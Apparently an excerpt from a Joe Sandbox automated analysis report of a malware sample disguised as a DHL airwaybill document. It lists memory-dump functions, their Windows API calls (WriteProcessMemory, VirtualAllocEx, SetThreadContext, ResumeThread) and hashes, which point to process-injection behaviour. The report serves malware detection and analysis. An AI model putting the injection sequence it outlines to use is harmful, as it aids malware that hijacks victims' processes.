                • Source File: 00000000.00000002.2154197406.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2790000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: 2d70e78ec736dcf24c230cdb90fc2665f88bebe657584b7c43b0c2f23ccb514e
                • Instruction ID: 91e70f84b43f2a086424cc8363b826cd3bf2ea668c74c6b0b74cae6311836975
                • Opcode Fuzzy Hash: 2d70e78ec736dcf24c230cdb90fc2665f88bebe657584b7c43b0c2f23ccb514e
                • Instruction Fuzzy Hash: AF4127B5A00309DFDB14CF99C858AAABBF5FF88314F25C499D519AB321D374A841CFA0
                Function 04D52480 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 621 4d52480-4d538ac 625 4d538b7-4d538c6 621->625 626 4d538ae-4d538b4 621->626 627 4d538c8 625->627 628 4d538cb-4d53904 DrawTextExW 625->628 626->625 627->628 629 4d53906-4d5390c 628->629 630 4d5390d-4d5392a 628->630 629->630
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D53845,?,?), ref: 04D538F7
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                • Opcode ID: a4f5744865e3e9827023195a5d681bcace496b9bef93591d6013fa74539e9fc6
                • Instruction ID: caa601d7a736baaaf94bc9a75f1ead4e0541c3a402056234d6fc77cdc20d1937
                • Opcode Fuzzy Hash: a4f5744865e3e9827023195a5d681bcace496b9bef93591d6013fa74539e9fc6
                • Instruction Fuzzy Hash: B63102B5D003499FDB10CF9AD880A9EBBF4BF48320F15842AE918A7350D774A944CFA4
                Function 04D53858 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 633 4d53858-4d5385a 634 4d5385c 633->634 635 4d5385e-4d538ac 633->635 634->635 637 4d538b7-4d538c6 635->637 638 4d538ae-4d538b4 635->638 639 4d538c8 637->639 640 4d538cb-4d53904 DrawTextExW 637->640 638->637 639->640 641 4d53906-4d5390c 640->641 642 4d5390d-4d5392a 640->642 641->642
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D53845,?,?), ref: 04D538F7
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                • Opcode ID: 047926af13195f8844803382f2ae2c0695e092552c115c6d0e13472885744d49
                • Instruction ID: 81f8658c5ad98b31edfd2eafb63e87c8022e8754edf2cee7cc46fd0b33bab27f
                • Opcode Fuzzy Hash: 047926af13195f8844803382f2ae2c0695e092552c115c6d0e13472885744d49
                • Instruction Fuzzy Hash: C431DFB5D013499FDF14CF9AD880AEEBBF4BB58360F14842AE918A7310D775A944CFA0
                Function 06B28CE8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 655 6b28ce8-6b28d3e 658 6b28d40-6b28d4c 655->658 659 6b28d4e-6b28d8d WriteProcessMemory 655->659 658->659 661 6b28d96-6b28dc6 659->661 662 6b28d8f-6b28d95 659->662 662->661
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B28D80
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: c388148fa8e3770fbe87ef4b33529c4d5cba81b82f5a0b6b87e660d4b5010005
                • Instruction ID: 7d27e691aaa888412ba41ee94c192cfe3d650cd2745d2fd300c1d96835d232a6
                • Opcode Fuzzy Hash: c388148fa8e3770fbe87ef4b33529c4d5cba81b82f5a0b6b87e660d4b5010005
                • Instruction Fuzzy Hash: 1B2123B19003599FDB10CFA9C881BDEBBF4FF48310F10842AE918A7240CB789954CBA5
                Function 04D5248C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 645 4d5248c-4d538ac 647 4d538b7-4d538c6 645->647 648 4d538ae-4d538b4 645->648 649 4d538c8 647->649 650 4d538cb-4d53904 DrawTextExW 647->650 648->647 649->650 651 4d53906-4d5390c 650->651 652 4d5390d-4d5392a 650->652 651->652
                APIs
                • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04D53845,?,?), ref: 04D538F7
                Memory Dump Source
                • Source File: 00000000.00000002.2156642635.0000000004D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d50000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DrawText
                • String ID:
                • API String ID: 2175133113-0
                • Opcode ID: b16316c8d3cc8bba3e8155dae36842cf807b0e967e82dee6ca5894a71e67bdfe
                • Instruction ID: bcf597b34d985bdcbba32be21efd5e1855c09328df1d517ac2c03c6a89ebb236
                • Opcode Fuzzy Hash: b16316c8d3cc8bba3e8155dae36842cf807b0e967e82dee6ca5894a71e67bdfe
                • Instruction Fuzzy Hash: 2B31DDB59003499FDB10CF9AD880AAEBBF5BB48360F14842AE919A7310D774A954CFA4
                Function 00C1D5B8 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 666 c1d5b8-c1d5ba 667 c1d5bc 666->667 668 c1d5be 666->668 667->668 669 c1d5c0-c1d654 DuplicateHandle 668->669 670 c1d656-c1d65c 669->670 671 c1d65d-c1d67a 669->671 670->671
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C1D586,?,?,?,?,?), ref: 00C1D647
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 2f9cc2bcd2ed1839ad0a0ff4e767198e5578c17d57cd8f19287bc4d0ad7fbc44
                • Instruction ID: e6899b740f585ed154356ac3f24752f81d9ba4ea605a69ad8fea9a3e4c264138
                • Opcode Fuzzy Hash: 2f9cc2bcd2ed1839ad0a0ff4e767198e5578c17d57cd8f19287bc4d0ad7fbc44
                • Instruction Fuzzy Hash: 333187B1800349DFDB10CFAAD880ADEBFF5AF49320F14841AE918A7350C378A981CF60
                Function 06B28CF0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 674 6b28cf0-6b28d3e 676 6b28d40-6b28d4c 674->676 677 6b28d4e-6b28d8d WriteProcessMemory 674->677 676->677 679 6b28d96-6b28dc6 677->679 680 6b28d8f-6b28d95 677->680 680->679
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B28D80
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: d8a2f61017145e9062deec69e97a36b29e66fa2fb0882ec10a82df1a8d6244ee
                • Instruction ID: 2ae1753a0e7c94dd99f0a6403227f73b224824ae9bb715ab17992761a87d1779
                • Opcode Fuzzy Hash: d8a2f61017145e9062deec69e97a36b29e66fa2fb0882ec10a82df1a8d6244ee
                • Instruction Fuzzy Hash: F42124B19003599FDF10DFAAC881BDEBBF5FF48310F10842AE918A7240C7789954CBA4
                Function 06B28DD9 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                Download Yara Rule
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B28E60
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 47a0cc5b2b97384b639cf10b60b6abbc21cf2edecc2f8470f4eb2f3edab7c130
                • Instruction ID: 6ed05ed82975901204fd4db8a31dbcc335cc025e8dca141b7f91b0001470689e
                • Opcode Fuzzy Hash: 47a0cc5b2b97384b639cf10b60b6abbc21cf2edecc2f8470f4eb2f3edab7c130
                • Instruction Fuzzy Hash: 7621F4B1C013599FDF10DFAAC881ADEBBF5FF48310F508429E519A7250CB389954CBA5
                Function 00C1B6D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C1D586,?,?,?,?,?), ref: 00C1D647
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 80a4c836cfe7f814cb60ca69bbc42fb909b4b70947f4643483dbda9093ef90f2
                • Instruction ID: 7636d85a8be1605a6539b652ad308b7653552bb4858edbe7b3b56a60081b0dd9
                • Opcode Fuzzy Hash: 80a4c836cfe7f814cb60ca69bbc42fb909b4b70947f4643483dbda9093ef90f2
                • Instruction Fuzzy Hash: B421E6B5900248EFDB10CFAAD484ADEBFF8EB49310F14841AE919A7350D374A954CFA5
                Function 06B28718 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B2879E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 14b67f4167344d27729905b65b81f22e7dd14c1428ca1040703dfb1f64899852
                • Instruction ID: 9907289b5092b9cef5883a2b058fe4e47e8a60f1f302bc1f63a16ade7d77b03a
                • Opcode Fuzzy Hash: 14b67f4167344d27729905b65b81f22e7dd14c1428ca1040703dfb1f64899852
                • Instruction Fuzzy Hash: 41215771D00309CFDB50CFAAC885BEEBBF4AF88314F14842AD459A7240DB389945CFA4
                Function 06B28720 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B2879E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: ca59f1ce814918234eb1cbf9a8f25683764413f4f5ca486d8ddc53a89ec5895c
                • Instruction ID: a47a62c91b74fa1e988114ea0f51f2f95ec470a5bcec71b8c1923ce4ee82b9a3
                • Opcode Fuzzy Hash: ca59f1ce814918234eb1cbf9a8f25683764413f4f5ca486d8ddc53a89ec5895c
                • Instruction Fuzzy Hash: EF2135B1D003098FDB50DFAAC885BEEBBF4EF88310F14842AD519A7240CB789944CFA5
                Function 06B28DE0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B28E60
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 8a73b473dabde8a4de982cbe36b34f7f3cc752d64bba26af938847c1606bb625
                • Instruction ID: 88a797692fc4931fb37bda5959cf9a62af567c04de099ac5e819f83cbfd5c517
                • Opcode Fuzzy Hash: 8a73b473dabde8a4de982cbe36b34f7f3cc752d64bba26af938847c1606bb625
                • Instruction Fuzzy Hash: AE2114B1C00359DFDB10DFAAC881AEEBBF5FF48310F10842AE518A7240C7389944CBA5
                Function 00C1B158 Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1AFB9,00000800,00000000,00000000), ref: 00C1B1CA
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: b3ed83c6a04962ec8e76f708e555bb55a2109176cfa3e3e9d51452fffde4ab8c
                • Instruction ID: 3935561760f3742e707132815463d7a0ddfeb47dd9c8614029a7225a4893184b
                • Opcode Fuzzy Hash: b3ed83c6a04962ec8e76f708e555bb55a2109176cfa3e3e9d51452fffde4ab8c
                • Instruction Fuzzy Hash: C1211AB6900249DFDB10CFAAC845ADEFBF5AB49710F118419D515B7300C375A945CFA5
                Function 06B28C28 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B28C9E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 85e70a63b652377532b425fcf917d03d1d20836aac385647a6c2374ab9307427
                • Instruction ID: e79f8e441f70467eb0b123910651888aa5c81f0941494183de4ca72d485e727d
                • Opcode Fuzzy Hash: 85e70a63b652377532b425fcf917d03d1d20836aac385647a6c2374ab9307427
                • Instruction Fuzzy Hash: B6116472800249DFDF10CFAAC845BDEBBF5EF88720F108419E519A7210CB79A950CFA1
                Function 06B2B6E0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 74b44de0ac4c6862e21fef921bc24063a10f2f634376356541e1cc1663b7fc32
                • Instruction ID: f97885b7d18e6b3c59ae7ab870ecbe6994e0196c8af6c71c7529b183593018ca
                • Opcode Fuzzy Hash: 74b44de0ac4c6862e21fef921bc24063a10f2f634376356541e1cc1663b7fc32
                • Instruction Fuzzy Hash: D31156B180439ACFDB10DFAAC485BDEBBF4EB48324F10849AD558A7241D778A544CFA5
                Function 00C1A0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1AFB9,00000800,00000000,00000000), ref: 00C1B1CA
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: ad4d3aab3a22177d35592e3063a97f708193cf56d7da772b91cb6872063ff10c
                • Instruction ID: 26ea11824e986b2e7a10fd38689c42e2d9ce3a84c91255c0929c6ac3220a1aa7
                • Opcode Fuzzy Hash: ad4d3aab3a22177d35592e3063a97f708193cf56d7da772b91cb6872063ff10c
                • Instruction Fuzzy Hash: 2C11D3B69042499FDB10CF9AC844ADEFBF4AB89710F11842AE519A7300C375A945CFA5
                Function 06B28C30 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B28C9E
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: e4b7e7da2df3315c71baaaae9bd2db60b00019be841036ad25a27c3ac756f741
                • Instruction ID: 711fd41f98d15164b201716e6a64aefa4237900cd9b03ef3bcbe83f360f83d71
                • Opcode Fuzzy Hash: e4b7e7da2df3315c71baaaae9bd2db60b00019be841036ad25a27c3ac756f741
                • Instruction Fuzzy Hash: 0E1144718002499FDB10DFAAC845ADEBBF5AF88720F108419E519A7250CB359944CBA0
                Function 06B28668 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 6159217bb22380bc3b977f278e6c764069a515afbeef151704fdc19e97aeeedd
                • Instruction ID: d40c5b136c923382567a95f24d23a3f52733c63ad9dcd1075835d55fe0008e1c
                • Opcode Fuzzy Hash: 6159217bb22380bc3b977f278e6c764069a515afbeef151704fdc19e97aeeedd
                • Instruction Fuzzy Hash: ED1116B1D003498FDB20DFAAC44579FBBF5AB88714F248419D519A7240CB79A944CFA5
                Function 06B2B6EC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: 16d35073f26788918bfc04134d1c2cf990bc6f7f28cacee74fd7766477161a35
                • Instruction ID: f277e99d9fd3c3008520c7acbcc86a675f5849eb761fc553ced40a168e5942f1
                • Opcode Fuzzy Hash: 16d35073f26788918bfc04134d1c2cf990bc6f7f28cacee74fd7766477161a35
                • Instruction Fuzzy Hash: 061155B6800349CFDB20DF9AC485BDEBBF4EB48320F10846AE558A7340C778A944CFA5
                Function 06B2B6D4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: e57b80a847c310dad02b9facdf8ca60d09c63bc580e1529107a1af78356601f8
                • Instruction ID: 2afad4c17ed3634231e26e71b8714fe22ccb7f17bef864bf177530994a228053
                • Opcode Fuzzy Hash: e57b80a847c310dad02b9facdf8ca60d09c63bc580e1529107a1af78356601f8
                • Instruction Fuzzy Hash: 9F1155B6800349CFDB20DF9AC485BDEBBF4EB48320F10846AE558A7340C738A944CFA5
                Function 06B2BED0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,06B2BD89,?,?), ref: 06B2BF30
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ChangeCloseFindNotification
                • String ID:
                • API String ID: 2591292051-0
                • Opcode ID: ba3203ea07f82ef4e30e0bfe41f403c6bb63fdb83a6f3023863803cf8cf5c8d3
                • Instruction ID: d0c96a7ded5cb50f62f0c1b38bae24991791b3892044bef0970873bdc6d18639
                • Opcode Fuzzy Hash: ba3203ea07f82ef4e30e0bfe41f403c6bb63fdb83a6f3023863803cf8cf5c8d3
                • Instruction Fuzzy Hash: 2E1146B580024ACFCB10CFA9C485BDEBFF4EB48310F10845AD558A7240C738A544CFA5
                Function 06B28670 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: ab48f203fee7fe19341aee70844ba090dae86b386212e8cc9c0f14189ea49c1e
                • Instruction ID: 668039442b63ce13ebabefccba5ae20fe78f4ba0edaee613786bc4a802fce450
                • Opcode Fuzzy Hash: ab48f203fee7fe19341aee70844ba090dae86b386212e8cc9c0f14189ea49c1e
                • Instruction Fuzzy Hash: BA1125B1D003498FDB20DFAAC84579EFBF5AF88620F24841AD519A7240CB79A944CBA5
                Function 06B27560 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B2B21D
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 0227efd871d9c44416dcdba0a61947a973ccb369ec93d2f85e46dcc255835e7a
                • Instruction ID: b4b3dabe02dc35dad2a41d2d78061ed4b849456b7bd325f84fb5882c721d3865
                • Opcode Fuzzy Hash: 0227efd871d9c44416dcdba0a61947a973ccb369ec93d2f85e46dcc255835e7a
                • Instruction Fuzzy Hash: 1C11F2B5800359DFDB50DF9AC845BDEFBF8EB48314F108459E518A7200C375A994CFA5
                Function 06B2B1B8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                Download Yara Rule
                APIs
                • PostMessageW.USER32(?,00000010,00000000,?), ref: 06B2B21D
                Memory Dump Source
                • Source File: 00000000.00000002.2157732339.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b20000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 611d635ff5f946117bf51bdd6a0796cbff620fd5502895e2aeba1ad96e55ed66
                • Instruction ID: c285dd48a9b35448b61359ca8a524d09f746c16b2d45fc5568e25ed059a723dd
                • Opcode Fuzzy Hash: 611d635ff5f946117bf51bdd6a0796cbff620fd5502895e2aeba1ad96e55ed66
                • Instruction Fuzzy Hash: 4B11E3B58003499FDB10DF99D845BDEBFF8EB48320F108459E558A7600C775A944CFA5
                Function 00C1AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AF3E
                Memory Dump Source
                • Source File: 00000000.00000002.2153519802.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c10000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 5509d3e9d82b3605e124d36d1e9029ec43d1f4abc9bdf94f26a6e2cb97504fa0
                • Instruction ID: 764892ee103e740d5ebfb5be286177f500e319dafafafbb40c0018158d9011f1
                • Opcode Fuzzy Hash: 5509d3e9d82b3605e124d36d1e9029ec43d1f4abc9bdf94f26a6e2cb97504fa0
                • Instruction Fuzzy Hash: 841113B5C01749CFDB10CF9AC444ADEFBF4AB88324F10841AD428A7200C379A545CFA5
                Function 0093D3D8 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d13107a0b850e68acd9a88bd55e4f6bd4dc3fd58dce01d1f5bf422a918960d9f
                • Instruction ID: 5ecedf52639a0a434e4b363f66889d85c7e7109b4fa96c639444aa1d197102dd
                • Opcode Fuzzy Hash: d13107a0b850e68acd9a88bd55e4f6bd4dc3fd58dce01d1f5bf422a918960d9f
                • Instruction Fuzzy Hash: 31213A71504204EFDB05DF14E9D4B26BF69FB94314F20C56DD9090B2A6C33AE856CFA2
                Function 0093D4C4 Relevance: .1, Instructions: 75COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2152974779.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_93d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 735c623d854fc2ef818979daf6139d3173fbede463f34e1830d420e37e12cb09
                • Instruction ID: a60b8e2ed7dcf768475781c503100c13ac39f3ca623165381cc10b402e73d6b6
                • Opcode Fuzzy Hash: 735c623d854fc2ef818979daf6139d3173fbede463f34e1830d420e37e12cb09
                • Instruction Fuzzy Hash: 5C212872505240EFDB05DF14E9D0B26BF65FB84318F20C569E9050B25AC33AD856CEA2
                Function 0094D1D4 Relevance: .1, Instructions: 72COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2153034298.000000000094D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0094D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_94d000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5482f272ba0ecd350d076d79eda25838160521ce1ca7defd26c47fb4c8676beb
